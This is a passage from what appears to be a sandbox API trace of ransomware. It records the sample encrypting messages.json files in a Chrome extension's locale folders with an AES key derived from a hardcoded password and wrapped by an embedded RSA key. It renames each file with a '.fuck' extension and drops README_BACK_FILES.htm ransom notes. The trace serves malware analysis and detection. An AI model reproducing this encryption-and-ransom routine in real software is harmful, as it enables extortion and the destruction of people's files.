Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.266] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.267] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e17480) returned 1 [0254.269] CryptCreateHash (in: hProv=0x2e17480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.269] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.269] CryptHashData (hHash=0x2e180e8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.269] CryptDeriveKey (in: hProv=0x2e17480, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18328) returned 1 [0254.270] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.270] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.270] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16af0) returned 1 [0254.270] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16af0, dwCertEncodingType=0x1, pInfo=0x298dff0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e020*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e028*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e183a8) returned 1 [0254.270] CryptEncrypt (in: hKey=0x2e183a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.270] CryptEncrypt (in: hKey=0x2e183a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e16a68*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e16a68*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.271] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e16a68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e16a68*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.272] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x114, lpOverlapped=0x0) returned 1 [0254.273] CryptEncrypt (in: hKey=0x2e18328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x114, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0254.273] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0254.273] CloseHandle (hObject=0x5d60) returned 1 [0254.273] CloseHandle (hObject=0x5d5c) returned 1 [0254.274] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0254.277] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0254.278] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0254.279] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0254.280] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0254.280] CryptDestroyKey (hKey=0x2e18328) returned 1 [0254.280] CryptReleaseContext (hProv=0x2e17480, dwFlags=0x0) returned 1 [0254.280] FindNextFileA (in: hFindFile=0x2e180a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.280] FindClose (in: hFindFile=0x2e180a8 | out: hFindFile=0x2e180a8) returned 1 [0254.280] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0254.280] AreFileApisANSI () returned 1 [0254.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.280] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.281] GetFileType (hFile=0x5d50) returned 0x1 [0254.281] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.282] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.282] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0254.283] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.283] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.283] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.284] GetLastError () returned 0x0 [0254.284] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json")) returned 0x20 [0254.284] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json", dwFileAttributes=0x80) returned 1 [0254.285] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.285] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.286] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.286] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e16b78) returned 1 [0254.289] CryptCreateHash (in: hProv=0x2e16b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.289] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.289] CryptHashData (hHash=0x2e18628, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.289] CryptDeriveKey (in: hProv=0x2e16b78, Algid=0x6610, hBaseData=0x2e18628, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18768) returned 1 [0254.289] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.289] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.289] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16c00) returned 1 [0254.290] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16c00, dwCertEncodingType=0x1, pInfo=0x298f440*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f470*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f478*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18228) returned 1 [0254.290] CryptEncrypt (in: hKey=0x2e18228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.290] CryptEncrypt (in: hKey=0x2e18228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e16c88*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e16c88*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.290] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e16c88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e16c88*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.292] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x14b, lpOverlapped=0x0) returned 1 [0254.302] CryptEncrypt (in: hKey=0x2e18768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x14b, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0254.302] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0254.302] CloseHandle (hObject=0x5d5c) returned 1 [0254.302] CloseHandle (hObject=0x5d60) returned 1 [0254.302] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), bFailIfExists=0) returned 1 [0254.308] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json", dwFileAttributes=0x0) returned 1 [0254.309] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.gsg")) returned 1 [0254.310] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.fuck")) returned 1 [0254.312] CryptDestroyHash (hHash=0x2e18628) returned 1 [0254.312] CryptDestroyKey (hKey=0x2e18768) returned 1 [0254.312] CryptReleaseContext (hProv=0x2e16b78, dwFlags=0x0) returned 1 [0254.312] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.312] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0254.312] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\readme_back_files.htm")) returned 0xffffffff [0254.312] AreFileApisANSI () returned 1 [0254.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.313] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.314] GetFileType (hFile=0x5d50) returned 0x1 [0254.314] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.315] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.315] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e185e8 [0254.316] FindNextFileA (in: hFindFile=0x2e185e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.316] FindNextFileA (in: hFindFile=0x2e185e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.316] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.316] GetLastError () returned 0x0 [0254.316] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json")) returned 0x20 [0254.316] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0254.317] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.317] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.321] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.322] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e167c0) returned 1 [0254.325] CryptCreateHash (in: hProv=0x2e167c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.325] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.325] CryptHashData (hHash=0x2e186e8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.325] CryptDeriveKey (in: hProv=0x2e167c0, Algid=0x6610, hBaseData=0x2e186e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e187e8) returned 1 [0254.325] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.325] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.325] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16848) returned 1 [0254.326] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16848, dwCertEncodingType=0x1, pInfo=0x298e0c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e0f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e0f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18628) returned 1 [0254.326] CryptEncrypt (in: hKey=0x2e18628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.326] CryptEncrypt (in: hKey=0x2e18628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17508*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17508*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.326] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e17508*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, 